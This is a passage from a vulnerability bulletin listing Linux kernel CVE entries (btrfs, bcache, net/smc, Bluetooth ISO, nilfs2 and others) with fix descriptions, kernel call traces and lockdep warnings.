Bochs 01/01/2011 Call Trace: <TASK> dump_stack_lvl+0x5b/0x80 __lock_acquire+0x2798/0x69d0 ? __pfx___lock_acquire+0x10/0x10 ? __pfx___lock_acquire+0x10/0x10 lock_acquire+0x19d/0x4a0 ? btrfs_map_block+0x39f/0x2250 ? __pfx_lock_acquire+0x10/0x10 ? find_held_lock+0x2d/0x110 ? lock_is_held_type+0x8f/0x100 down_read+0x8e/0x440 ? btrfs_map_block+0x39f/0x2250 ? __pfx_down_read+0x10/0x10 ? do_raw_read_unlock+0x44/0x70 ? _raw_read_unlock+0x23/0x40 btrfs_map_block+0x39f/0x2250 ? btrfs_dev_replace_by_ioctl+0xd69/0x1d00 ? btrfs_bio_counter_inc_blocked+0xd9/0x2e0 ? __kasan_slab_alloc+0x6e/0x70 ? __pfx_btrfs_map_block+0x10/0x10 ? __pfx_btrfs_bio_counter_inc_blocked+0x10/0x10 ? kmem_cache_alloc_noprof+0x1f2/0x300 ? mempool_alloc_noprof+0xed/0x2b0 btrfs_submit_chunk+0x28d/0x17e0 ? __pfx_btrfs_submit_chunk+0x10/0x10 ? bvec_alloc+0xd7/0x1b0 ? bio_add_folio+0x171/0x270 ? __pfx_bio_add_folio+0x10/0x10 ? __kasan_check_read+0x20/0x20 btrfs_submit_bio+0x37/0x80 read_extent_buffer_pages+0x3df/0x6c0 btrfs_read_extent_buffer+0x13e/0x5f0 read_tree_block+0x81/0xe0 read_block_for_search+0x4bd/0x7a0 ? __pfx_read_block_for_search+0x10/0x10 btrfs_search_slot+0x78d/0x2720 ? __pfx_btrfs_search_slot+0x10/0x10 ? lock_is_held_type+0x8f/0x100 ? kasan_save_track+0x14/0x30 ? __kasan_slab_alloc+0x6e/0x70 ? kmem_cache_alloc_noprof+0x1f2/0x300 btrfs_get_raid_extent_offset+0x181/0x820 ? __pfx_lock_acquire+0x10/0x10 ? __pfx_btrfs_get_raid_extent_offset+0x10/0x10 ? down_read+0x194/0x440 ? __pfx_down_read+0x10/0x10 ? do_raw_read_unlock+0x44/0x70 ? _raw_read_unlock+0x23/0x40 btrfs_map_block+0x5b5/0x2250 ? __pfx_btrfs_map_block+0x10/0x10 scrub_submit_initial_read+0x8fe/0x11b0 ? __pfx_scrub_submit_initial_read+0x10/0x10 submit_initial_group_read+0x161/0x3a0 ? lock_release+0x20e/0x710 ? __pfx_submit_initial_group_read+0x10/0x10 ? __pfx_lock_release+0x10/0x10 scrub_simple_mirror.isra.0+0x3eb/0x580 scrub_stripe+0xe4d/0x1440 ? lock_release+0x20e/0x710 ? __pfx_scrub_stripe+0x10/0x10 ? __pfx_lock_release+0x10/0x10 ? do_raw_read_unlock+0x44/0x70 ? _raw_read_unlock+0x23/0x40 scrub_chunk+0x257/0x4a0 scrub_enumerate_chunks+0x64c/0xf70 ? __mutex_unlock_slowpath+0x147/0x5f0 ? __pfx_scrub_enumerate_chunks+0x10/0x10 ? bit_wait_timeout+0xb0/0x170 ? __up_read+0x189/0x700 ? scrub_workers_get+0x231/0x300 ? up_write+0x490/0x4f0 btrfs_scrub_dev+0x52e/0xcd0 ? create_pending_snapshots+0x230/0x250 ? __pfx_btrfs_scrub_dev+0x10/0x10 btrfs_dev_replace_by_ioctl+0xd69/0x1d00 ? lock_acquire+0x19d/0x4a0 ? __pfx_btrfs_dev_replace_by_ioctl+0x10/0x10 ? ---truncated--- | 2025-01-11 | not yet calculated | CVE-2024-48875 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: stackdepot: fix stack_depot_save_flags() in NMI context Per documentation, stack_depot_save_flags() was meant to be usable from NMI context if STACK_DEPOT_FLAG_CAN_ALLOC is unset. However, it still would try to take the pool_lock in an attempt to save a stack trace in the current pool (if space is available). This could result in deadlock if an NMI is handled while pool_lock is already held. To avoid deadlock, only try to take the lock in NMI context and give up if unsuccessful. The documentation is fixed to clearly convey this. | 2025-01-11 | not yet calculated | CVE-2024-48876 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: bcache: revert replacing IS_ERR_OR_NULL with IS_ERR again Commit 028ddcac477b ("bcache: Remove unnecessary NULL point check in node allocations") leads a NULL pointer deference in cache_set_flush(). 1721 if (!IS_ERR_OR_NULL(c->root)) 1722 list_add(&c->root->list, &c->btree_cache); >From the above code in cache_set_flush(), if previous registration code fails before allocating c->root, it is possible c->root is NULL as what it is initialized. __bch_btree_node_alloc() never returns NULL but c->root is possible to be NULL at above line 1721. This patch replaces IS_ERR() by IS_ERR_OR_NULL() to fix this. | 2025-01-11 | not yet calculated | CVE-2024-48881 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/smc: check v2_ext_offset/eid_cnt/ism_gid_cnt when receiving proposal msg When receiving proposal msg in server, the fields v2_ext_offset/ eid_cnt/ism_gid_cnt in proposal msg are from the remote client and can not be fully trusted. Especially the field v2_ext_offset, once exceed the max value, there has the chance to access wrong address, and crash may happen. This patch checks the fields v2_ext_offset/eid_cnt/ism_gid_cnt before using them. | 2025-01-11 | not yet calculated | CVE-2024-49568 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nvme-rdma: unquiesce admin_q before destroy it Kernel will hang on destroy admin_q while we create ctrl failed, such as following calltrace: PID: 23644 TASK: ff2d52b40f439fc0 CPU: 2 COMMAND: "nvme" #0 [ff61d23de260fb78] __schedule at ffffffff8323bc15 #1 [ff61d23de260fc08] schedule at ffffffff8323c014 #2 [ff61d23de260fc28] blk_mq_freeze_queue_wait at ffffffff82a3dba1 #3 [ff61d23de260fc78] blk_freeze_queue at ffffffff82a4113a #4 [ff61d23de260fc90] blk_cleanup_queue at ffffffff82a33006 #5 [ff61d23de260fcb0] nvme_rdma_destroy_admin_queue at ffffffffc12686ce #6 [ff61d23de260fcc8] nvme_rdma_setup_ctrl at ffffffffc1268ced #7 [ff61d23de260fd28] nvme_rdma_create_ctrl at ffffffffc126919b #8 [ff61d23de260fd68] nvmf_dev_write at ffffffffc024f362 #9 [ff61d23de260fe38] vfs_write at ffffffff827d5f25 RIP: 00007fda7891d574 RSP: 00007ffe2ef06958 RFLAGS: 00000202 RAX: ffffffffffffffda RBX: 000055e8122a4d90 RCX: 00007fda7891d574 RDX: 000000000000012b RSI: 000055e8122a4d90 RDI: 0000000000000004 RBP: 00007ffe2ef079c0 R8: 000000000000012b R9: 000055e8122a4d90 R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000004 R13: 000055e8122923c0 R14: 000000000000012b R15: 00007fda78a54500 ORIG_RAX: 0000000000000001 CS: 0033 SS: 002b This due to we have quiesced admi_q before cancel requests, but forgot to unquiesce before destroy it, as a result we fail to drain the pending requests, and hang on blk_mq_freeze_queue_wait() forever. Here try to reuse nvme_rdma_teardown_admin_queue() to fix this issue and simplify the code. | 2025-01-11 | not yet calculated | CVE-2024-49569 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/smc: check iparea_offset and ipv6_prefixes_cnt when receiving proposal msg When receiving proposal msg in server, the field iparea_offset and the field ipv6_prefixes_cnt in proposal msg are from the remote client and can not be fully trusted. Especially the field iparea_offset, once exceed the max value, there has the chance to access wrong address, and crash may happen. This patch checks iparea_offset and ipv6_prefixes_cnt before using them. | 2025-01-11 | not yet calculated | CVE-2024-49571 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sched/fair: Fix NEXT_BUDDY Adam reports that enabling NEXT_BUDDY insta triggers a WARN in pick_next_entity(). Moving clear_buddies() up before the delayed dequeue bits ensures no ->next buddy becomes delayed. Further ensure no new ->next buddy ever starts as delayed. | 2025-01-11 | not yet calculated | CVE-2024-49573 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: spi: mpc52xx: Add cancel_work_sync before module remove If we remove the module which will call mpc52xx_spi_remove it will free 'ms' through spi_unregister_controller. while the work ms->work will be used. The sequence of operations that may lead to a UAF bug. Fix it by ensuring that the work is canceled before proceeding with the cleanup in mpc52xx_spi_remove. | 2025-01-11 | not yet calculated | CVE-2024-50051 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: use aligned address in copy_user_gigantic_page() In current kernel, hugetlb_wp() calls copy_user_large_folio() with the fault address. Where the fault address may be not aligned with the huge page size. Then, copy_user_large_folio() may call copy_user_gigantic_page() with the address, while copy_user_gigantic_page() requires the address to be huge page size aligned. So, this may cause memory corruption or information leak, addtional, use more obvious naming 'addr_hint' instead of 'addr' for copy_user_gigantic_page(). | 2025-01-11 | not yet calculated | CVE-2024-51729 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: use aligned address in clear_gigantic_page() In current kernel, hugetlb_no_page() calls folio_zero_user() with the fault address. Where the fault address may be not aligned with the huge page size. Then, folio_zero_user() may call clear_gigantic_page() with the address, while clear_gigantic_page() requires the address to be huge page size aligned. So, this may cause memory corruption or information leak, addtional, use more obvious naming 'addr_hint' instead of 'addr' for clear_gigantic_page(). | 2025-01-11 | not yet calculated | CVE-2024-52319 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: igb: Fix potential invalid memory access in igb_init_module() The pci_register_driver() can fail and when this happened, the dca_notifier needs to be unregistered, otherwise the dca_notifier can be called when igb fails to install, resulting to invalid memory access. | 2025-01-11 | not yet calculated | CVE-2024-52332 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ipvs: fix UB due to uninitialized stack access in ip_vs_protocol_init() Under certain kernel configurations when building with Clang/LLVM, the compiler does not generate a return or jump as the terminator instruction for ip_vs_protocol_init(), triggering the following objtool warning during build time: vmlinux.o: warning: objtool: ip_vs_protocol_init() falls through to next function __initstub__kmod_ip_vs_rr__935_123_ip_vs_rr_init6() At runtime, this either causes an oops when trying to load the ipvs module or a boot-time panic if ipvs is built-in. This same issue has been reported by the Intel kernel test robot previously. Digging deeper into both LLVM and the kernel code reveals this to be a undefined behavior problem. ip_vs_protocol_init() uses a on-stack buffer of 64 chars to store the registered protocol names and leaves it uninitialized after definition. The function calls strnlen() when concatenating protocol names into the buffer. With CONFIG_FORTIFY_SOURCE strnlen() performs an extra step to check whether the last byte of the input char buffer is a null character (commit 3009f891bb9f ("fortify: Allow strlen() and strnlen() to pass compile-time known lengths")). This, together with possibly other configurations, cause the following IR to be generated: define hidden i32 @ip_vs_protocol_init() local_unnamed_addr #5 section ".init.text" align 16 !kcfi_type !29 { %1 = alloca [64 x i8], align 16 ... 14: ; preds = %11 %15 = getelementptr inbounds i8, ptr %1, i64 63 %16 = load i8, ptr %15, align 1 %17 = tail call i1 @llvm.is.constant.i8(i8 %16) %18 = icmp eq i8 %16, 0 %19 = select i1 %17, i1 %18, i1 false br i1 %19, label %20, label %23 20: ; preds = %14 %21 = call i64 @strlen(ptr noundef nonnull dereferenceable(1) %1) #23 ... 23: ; preds = %14, %11, %20 %24 = call i64 @strnlen(ptr noundef nonnull dereferenceable(1) %1, i64 noundef 64) #24 ... } The above code calculates the address of the last char in the buffer (value %15) and then loads from it (value %16). Because the buffer is never initialized, the LLVM GVN pass marks value %16 as undefined: %13 = getelementptr inbounds i8, ptr %1, i64 63 br i1 undef, label %14, label %17 This gives later passes (SCCP, in particular) more DCE opportunities by propagating the undef value further, and eventually removes everything after the load on the uninitialized stack location: define hidden i32 @ip_vs_protocol_init() local_unnamed_addr #0 section ".init.text" align 16 !kcfi_type !11 { %1 = alloca [64 x i8], align 16 ... 12: ; preds = %11 %13 = getelementptr inbounds i8, ptr %1, i64 63 unreachable } In this way, the generated native code will just fall through to the next function, as LLVM does not generate any code for the unreachable IR instruction and leaves the function without a terminator. Zero the on-stack buffer to avoid this possible UB. | 2025-01-11 | not yet calculated | CVE-2024-53680 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: regulator: axp20x: AXP717: set ramp_delay AXP717 datasheet says that regulator ramp delay is 15.625 us/step, which is 10mV in our case. Add a AXP_DESC_RANGES_DELAY macro and update AXP_DESC_RANGES macro to expand to AXP_DESC_RANGES_DELAY with ramp_delay = 0 For DCDC4, steps is 100mv Add a AXP_DESC_DELAY macro and update AXP_DESC macro to expand to AXP_DESC_DELAY with ramp_delay = 0 This patch fix crashes when using CPU DVFS. | 2025-01-11 | not yet calculated | CVE-2024-53682 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ceph: give up on paths longer than PATH_MAX If the full path to be built by ceph_mdsc_build_path() happens to be longer than PATH_MAX, then this function will enter an endless (retry) loop, effectively blocking the whole task. Most of the machine becomes unusable, making this a very simple and effective DoS vulnerability. I cannot imagine why this retry was ever implemented, but it seems rather useless and harmful to me. Let's remove it and fail with ENAMETOOLONG instead. | 2025-01-11 | not yet calculated | CVE-2024-53685 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: riscv: Fix IPIs usage in kfence_protect_page() flush_tlb_kernel_range() may use IPIs to flush the TLBs of all the cores, which triggers the following warning when the irqs are disabled: [ 3.455330] WARNING: CPU: 1 PID: 0 at kernel/smp.c:815 smp_call_function_many_cond+0x452/0x520 [ 3.456647] Modules linked in: [ 3.457218] CPU: 1 UID: 0 PID: 0 Comm: swapper/1 Not tainted 6.12.0-rc7-00010-g91d3de7240b8 #1 [ 3.457416] Hardware name: QEMU QEMU Virtual Machine, BIOS [ 3.457633] epc : smp_call_function_many_cond+0x452/0x520 [ 3.457736] ra : on_each_cpu_cond_mask+0x1e/0x30 [ 3.457786] epc : ffffffff800b669a ra : ffffffff800b67c2 sp : ff2000000000bb50 [ 3.457824] gp : ffffffff815212b8 tp : ff6000008014f080 t0 : 000000000000003f [ 3.457859] t1 : ffffffff815221e0 t2 : 000000000000000f s0 : ff2000000000bc10 [ 3.457920] s1 : 0000000000000040 a0 : ffffffff815221e0 a1 : 0000000000000001 [ 3.457953] a2 : 0000000000010000 a3 : 0000000000000003 a4 : 0000000000000000 [ 3.458006] a5 : 0000000000000000 a6 : ffffffffffffffff a7 : 0000000000000000 [ 3.458042] s2 : ffffffff815223be s3 : 00fffffffffff000 s4 : ff600001ffe38fc0 [ 3.458076] s5 : ff600001ff950d00 s6 : 0000000200000120 s7 : 0000000000000001 [ 3.458109] s8 : 0000000000000001 s9 : ff60000080841ef0 s10: 0000000000000001 [ 3.458141] s11: ffffffff81524812 t3 : 0000000000000001 t4 : ff60000080092bc0 [ 3.458172] t5 : 0000000000000000 t6 : ff200000000236d0 [ 3.458203] status: 0000000200000100 badaddr: ffffffff800b669a cause: 0000000000000003 [ 3.458373] [<ffffffff800b669a>] smp_call_function_many_cond+0x452/0x520 [ 3.458593] [<ffffffff800b67c2>] on_each_cpu_cond_mask+0x1e/0x30 [ 3.458625] [<ffffffff8000e4ca>] __flush_tlb_range+0x118/0x1ca [ 3.458656] [<ffffffff8000e6b2>] flush_tlb_kernel_range+0x1e/0x26 [ 3.458683] [<ffffffff801ea56a>] kfence_protect+0xc0/0xce [ 3.458717] [<ffffffff801e9456>] kfence_guarded_free+0xc6/0x1c0 [ 3.458742] [<ffffffff801e9d6c>] __kfence_free+0x62/0xc6 [ 3.458764] [<ffffffff801c57d8>] kfree+0x106/0x32c [ 3.458786] [<ffffffff80588cf2>] detach_buf_split+0x188/0x1a8 [ 3.458816] [<ffffffff8058708c>] virtqueue_get_buf_ctx+0xb6/0x1f6 [ 3.458839] [<ffffffff805871da>] virtqueue_get_buf+0xe/0x16 [ 3.458880] [<ffffffff80613d6a>] virtblk_done+0x5c/0xe2 [ 3.458908] [<ffffffff8058766e>] vring_interrupt+0x6a/0x74 [ 3.458930] [<ffffffff800747d8>] __handle_irq_event_percpu+0x7c/0xe2 [ 3.458956] [<ffffffff800748f0>] handle_irq_event+0x3c/0x86 [ 3.458978] [<ffffffff800786cc>] handle_simple_irq+0x9e/0xbe [ 3.459004] [<ffffffff80073934>] generic_handle_domain_irq+0x1c/0x2a [ 3.459027] [<ffffffff804bf87c>] imsic_handle_irq+0xba/0x120 [ 3.459056] [<ffffffff80073934>] generic_handle_domain_irq+0x1c/0x2a [ 3.459080] [<ffffffff804bdb76>] riscv_intc_aia_irq+0x24/0x34 [ 3.459103] [<ffffffff809d0452>] handle_riscv_irq+0x2e/0x4c [ 3.459133] [<ffffffff809d923e>] call_on_irq_stack+0x32/0x40 So only flush the local TLB and let the lazy kfence page fault handling deal with the faults which could happen when a core has an old protected pte version cached in its TLB. That leads to potential inaccuracies which can be tolerated when using kfence. | 2025-01-11 | not yet calculated | CVE-2024-53687 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: block: Fix potential deadlock while freezing queue and acquiring sysfs_lock For storing a value to a queue attribute, the queue_attr_store function first freezes the queue (->q_usage_counter(io)) and then acquire ->sysfs_lock. This seems not correct as the usual ordering should be to acquire ->sysfs_lock before freezing the queue. This incorrect ordering causes the following lockdep splat which we are able to reproduce always simply by accessing /sys/kernel/debug file using ls command: [ 57.597146] WARNING: possible circular locking dependency detected [ 57.597154] 6.12.0-10553-gb86545e02e8c #20 Tainted: G W [ 57.597162] ------------------------------------------------------ [ 57.597168] ls/4605 is trying to acquire lock: [ 57.597176] c00000003eb56710 (&mm->mmap_lock){++++}-{4:4}, at: __might_fault+0x58/0xc0 [ 57.597200] but task is already holding lock: [ 57.597207] c0000018e27c6810 (&sb->s_type->i_mutex_key#3){++++}-{4:4}, at: iterate_dir+0x94/0x1d4 [ 57.597226] which lock already depends on the new lock. [ 57.597233] the existing dependency chain (in reverse order) is: [ 57.597241] -> #5 (&sb->s_type->i_mutex_key#3){++++}-{4:4}: [ 57.597255] down_write+0x6c/0x18c [ 57.597264] start_creating+0xb4/0x24c [ 57.597274] debugfs_create_dir+0x2c/0x1e8 [ 57.597283] blk_register_queue+0xec/0x294 [ 57.597292] add_disk_fwnode+0x2e4/0x548 [ 57.597302] brd_alloc+0x2c8/0x338 [ 57.597309] brd_init+0x100/0x178 [ 57.597317] do_one_initcall+0x88/0x3e4 [ 57.597326] kernel_init_freeable+0x3cc/0x6e0 [ 57.597334] kernel_init+0x34/0x1cc [ 57.597342] ret_from_kernel_user_thread+0x14/0x1c [ 57.597350] -> #4 (&q->debugfs_mutex){+.+.}-{4:4}: [ 57.597362] __mutex_lock+0xfc/0x12a0 [ 57.597370] blk_register_queue+0xd4/0x294 [ 57.597379] add_disk_fwnode+0x2e4/0x548 [ 57.597388] brd_alloc+0x2c8/0x338 [ 57.597395] brd_init+0x100/0x178 [ 57.597402] do_one_initcall+0x88/0x3e4 [ 57.597410] kernel_init_freeable+0x3cc/0x6e0 [ 57.597418] kernel_init+0x34/0x1cc [ 57.597426] ret_from_kernel_user_thread+0x14/0x1c [ 57.597434] -> #3 (&q->sysfs_lock){+.+.}-{4:4}: [ 57.597446] __mutex_lock+0xfc/0x12a0 [ 57.597454] queue_attr_store+0x9c/0x110 [ 57.597462] sysfs_kf_write+0x70/0xb0 [ 57.597471] kernfs_fop_write_iter+0x1b0/0x2ac [ 57.597480] vfs_write+0x3dc/0x6e8 [ 57.597488] ksys_write+0x84/0x140 [ 57.597495] system_call_exception+0x130/0x360 [ 57.597504] system_call_common+0x160/0x2c4 [ 57.597516] -> #2 (&q->q_usage_counter(io)#21){++++}-{0:0}: [ 57.597530] __submit_bio+0x5ec/0x828 [ 57.597538] submit_bio_noacct_nocheck+0x1e4/0x4f0 [ 57.597547] iomap_readahead+0x2a0/0x448 [ 57.597556] xfs_vm_readahead+0x28/0x3c [ 57.597564] read_pages+0x88/0x41c [ 57.597571] page_cache_ra_unbounded+0x1ac/0x2d8 [ 57.597580] filemap_get_pages+0x188/0x984 [ 57.597588] filemap_read+0x13c/0x4bc [ 57.597596] xfs_file_buffered_read+0x88/0x17c [ 57.597605] xfs_file_read_iter+0xac/0x158 [ 57.597614] vfs_read+0x2d4/0x3b4 [ 57.597622] ksys_read+0x84/0x144 [ 57.597629] system_call_exception+0x130/0x360 [ 57.597637] system_call_common+0x160/0x2c4 [ 57.597647] -> #1 (mapping.invalidate_lock#2){++++}-{4:4}: [ 57.597661] down_read+0x6c/0x220 [ 57.597669] filemap_fault+0x870/0x100c [ 57.597677] xfs_filemap_fault+0xc4/0x18c [ 57.597684] __do_fault+0x64/0x164 [ 57.597693] __handle_mm_fault+0x1274/0x1dac [ 57.597702] handle_mm_fault+0x248/0x48 ---truncated--- | 2025-01-11 | not yet calculated | CVE-2024-53689 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nilfs2: prevent use of deleted inode syzbot reported a WARNING in nilfs_rmdir. [1] Because the inode bitmap is corrupted, an inode with an inode number that should exist as a ".nilfs" file was reassigned by nilfs_mkdir for "file0", causing an inode duplication during execution. And this causes an underflow of i_nlink in rmdir operations. The inode is used twice by the same task to unmount and remove directories ".nilfs" and "file0", it trigger warning in nilfs_rmdir. Avoid to this issue, check i_nlink in nilfs_iget(), if it is 0, it means that this inode has been deleted, and iput is executed to reclaim it. [1] WARNING: CPU: 1 PID: 5824 at fs/inode.c:407 drop_nlink+0xc4/0x110 fs/inode.c:407 ... Call Trace: <TASK> nilfs_rmdir+0x1b0/0x250 fs/nilfs2/namei.c:342 vfs_rmdir+0x3a3/0x510 fs/namei.c:4394 do_rmdir+0x3b5/0x580 fs/namei.c:4453 __do_sys_rmdir fs/namei.c:4472 [inline] __se_sys_rmdir fs/namei.c:4470 [inline] __x64_sys_rmdir+0x47/0x50 fs/namei.c:4470 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2025-01-11 | not yet calculated | CVE-2024-53690 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: iso: Fix circular lock in iso_conn_big_sync This fixes the circular locking dependency warning below, by reworking iso_sock_recvmsg, to ensure that the socket lock is always released before calling a function that locks hdev. [ 561.670344] ====================================================== [ 561.670346] WARNING: possible circular locking dependency detected [ 561.670349] 6.12.0-rc6+ #26 Not tainted [ 561.670351] ------------------------------------------------------ [ 561.670353] iso-tester/3289 is trying to acquire lock: [ 561.670355] ffff88811f600078 (&hdev->lock){+.+.}-{3:3}, at: iso_conn_big_sync+0x73/0x260 [bluetooth] [ 561.670405] but task is already holding lock: [ 561.670407] ffff88815af58258 (sk_lock-AF_BLUETOOTH){+.+.}-{0:0}, at: iso_sock_recvmsg+0xbf/0x500 [bluetooth] [ 561.670450] which lock already depends on the new lock. [ 561.670452] the existing dependency chain (in reverse order) is: [ 561.670453] -> #2 (sk_lock-AF_BLUETOOTH){+.+.}-{0:0}: [ 561.670458] lock_acquire+0x7c/0xc0 [ 561.670463] lock_sock_nested+0x3b/0xf0 [ 561.670467] bt_accept_dequeue+0x1a5/0x4d0 [bluetooth] [ 561.670510] iso_sock_accept+0x271/0x830 [bluetooth] [ 561.670547] do_accept+0x3dd/0x610 [ 561.670550] __sys_accept4+0xd8/0x170 [ 561.670553] __x64_sys_accept+0x74/0xc0 [ 561.670556] x64_sys_call+0x17d6/0x25f0 [ 561.670559] do_syscall_64+0x87/0x150 [ 561.670563] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 561.670567] -> #1 (sk_lock-AF_BLUETOOTH-BTPROTO_ISO){+.+.}-{0:0}: [ 561.670571] lock_acquire+0x7c/0xc0 [ 561.670574] lock_sock_nested+0x3b/0xf0 [ 561.670577] iso_sock_listen+0x2de/0xf30 [bluetooth] [ 561.670617] __sys_listen_socket+0xef/0x130 [ 561.670620] __x64_sys_listen+0xe1/0x190 [ 561.670623] x64_sys_call+0x2517/0x25f0 [ 561.670626] do_syscall_64+0x87/0x150 [ 561.670629] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 561.670632] -> #0 (&hdev->lock){+.+.}-{3:3}: [ 561.670636] __lock_acquire+0x32ad/0x6ab0 [ 561.670639] lock_acquire.part.0+0x118/0x360 [ 561.670642] lock_acquire+0x7c/0xc0 [ 561.670644] __mutex_lock+0x18d/0x12f0 [ 561.670647] mutex_lock_nested+0x1b/0x30 [ 561.670651] iso_conn_big_sync+0x73/0x260 [bluetooth] [ 561.670687] iso_sock_recvmsg+0x3e9/0x500 [bluetooth] [ 561.670722] sock_recvmsg+0x1d5/0x240 [ 561.670725] sock_read_iter+0x27d/0x470 [ 561.670727] vfs_read+0x9a0/0xd30 [ 561.670731] ksys_read+0x1a8/0x250 [ 561.670733] __x64_sys_read+0x72/0xc0 [ 561.670736] x64_sys_call+0x1b12/0x25f0 [ 561.670738] do_syscall_64+0x87/0x150 [ 561.670741] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 561.670744] other info that might help us debug this: [ 561.670745] Chain exists of: &hdev->lock --> sk_lock-AF_BLUETOOTH-BTPROTO_ISO --> sk_lock-AF_BLUETOOTH [ 561.670751] Possible unsafe locking scenario: [ 561.670753] CPU0 CPU1 [ 561.670754] ---- ---- [ 561.670756] lock(sk_lock-AF_BLUETOOTH); [ 561.670758] lock(sk_lock AF_BLUETOOTH-BTPROTO_ISO); [ 561.670761] lock(sk_lock-AF_BLUETOOTH); [ 561.670764] lock(&hdev->lock); [ 561.670767] *** DEADLOCK *** | 2025-01-11 | not yet calculated | CVE-2024-54191 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Fix WARN in ivpu_ipc_send_receive_internal() Move pm_runtime_set_active() to ivpu_pm_init() so when ivpu_ipc_send_receive_internal() is executed before ivpu_pm_enable() it already has correct runtime state, even if last resume was not successful. | 2025-01-11 | not yet calculated | CVE-2024-54193 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Fix general protection fault in ivpu_bo_list() Check if ctx is not NULL before accessing its fields. | 2025-01-11 | not yet calculated | CVE-2024-54455 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: iso: Fix circular lock in iso_listen_bis This fixes the circular locking dependency warning below, by releasing the socket lock before enterning iso_listen_bis, to avoid any potential deadlock with hdev lock. [ 75.307983] ====================================================== [ 75.307984] WARNING: possible circular locking dependency detected [ 75.307985] 6.12.0-rc6+ #22 Not tainted [ 75.307987] ------------------------------------------------------ [ 75.307987] kworker/u81:2/2623 is trying to acquire lock: [ 75.307988] ffff8fde1769da58 (sk_lock-AF_BLUETOOTH-BTPROTO_ISO) at: iso_connect_cfm+0x253/0x840 [bluetooth] [ 75.308021] but task is already holding lock: [ 75.308022] ffff8fdd61a10078 (&hdev->lock) at: hci_le_per_adv_report_evt+0x47/0x2f0 [bluetooth] [ 75.308053] which lock already depends on the new lock. [ 75.308054] the existing dependency chain (in reverse order) is: [ 75.308055] -> #1 (&hdev->lock){+.+.}-{3:3}: [ 75.308057] __mutex_lock+0xad/0xc50 [ 75.308061] mutex_lock_nested+0x1b/0x30 [ 75.308063] iso_sock_listen+0x143/0x5c0 [bluetooth] [ 75.308085] __sys_listen_socket+0x49/0x60 [ 75.308088] __x64_sys_listen+0x4c/0x90 [ 75.308090] x64_sys_call+0x2517/0x25f0 [ 75.308092] do_syscall_64+0x87/0x150 [ 75.308095] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 75.308098] -> #0 (sk_lock-AF_BLUETOOTH-BTPROTO_ISO){+.+.}-{0:0}: [ 75.308100] __lock_acquire+0x155e/0x25f0 [ 75.308103] lock_acquire+0xc9/0x300 [ 75.308105] lock_sock_nested+0x32/0x90 [ 75.308107] iso_connect_cfm+0x253/0x840 [bluetooth] [ 75.308128] hci_connect_cfm+0x6c/0x190 [bluetooth] [ 75.308155] hci_le_per_adv_report_evt+0x27b/0x2f0 [bluetooth] [ 75.308180] hci_le_meta_evt+0xe7/0x200 [bluetooth] [ 75.308206] hci_event_packet+0x21f/0x5c0 [bluetooth] [ 75.308230] hci_rx_work+0x3ae/0xb10 [bluetooth] [ 75.308254] process_one_work+0x212/0x740 [ 75.308256] worker_thread+0x1bd/0x3a0 [ 75.308258] kthread+0xe4/0x120 [ 75.308259] ret_from_fork+0x44/0x70 [ 75.308261] ret_from_fork_asm+0x1a/0x30 [ 75.308263] other info that might help us debug this: [ 75.308264] Possible unsafe locking scenario: [ 75.308264] CPU0 CPU1 [ 75.308265] ---- ---- [ 75.308265] lock(&hdev->lock); [ 75.308267] lock(sk_lock- AF_BLUETOOTH-BTPROTO_ISO); [ 75.308268] lock(&hdev->lock); [ 75.308269] lock(sk_lock-AF_BLUETOOTH-BTPROTO_ISO); [ 75.308270] *** DEADLOCK *** [ 75.308271] 4 locks held by kworker/u81:2/2623: [ 75.308272] #0: ffff8fdd66e52148 ((wq_completion)hci0#2){+.+.}-{0:0}, at: process_one_work+0x443/0x740 [ 75.308276] #1: ffffafb488b7fe48 ((work_completion)(&hdev->rx_work)), at: process_one_work+0x1ce/0x740 [ 75.308280] #2: ffff8fdd61a10078 (&hdev->lock){+.+.}-{3:3} at: hci_le_per_adv_report_evt+0x47/0x2f0 [bluetooth] [ 75.308304] #3: ffffffffb6ba4900 (rcu_read_lock){....}-{1:2}, at: hci_connect_cfm+0x29/0x190 [bluetooth] | 2025-01-11 | not yet calculated | CVE-2024-54460 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: smb: client: fix TCP timers deadlock after rmmod Commit ef7134c7fc48 ("smb: client: Fix use-after-free of network namespace.") fixed a netns UAF by manually enabled socket refcounting (sk->sk_net_refcnt=1 and sock_inuse_add(net, 1)). The reason the patch worked for that bug was because we now hold references to the netns (get_net_track() gets a ref internally) and they're properly released (internally, on __sk_destruct()), but only because sk->sk_net_refcnt was set. Problem: (this happens regardless of CONFIG_NET_NS_REFCNT_TRACKER and regardless if init_net or other) Setting sk->sk_net_refcnt=1 *manually* and *after* socket creation is not only out of cifs scope, but also technically wrong -- it's set conditionally based on user (=1) vs kernel (=0) sockets. And net/ implementations seem to base their user vs kernel space operations on it. e.g. upon TCP 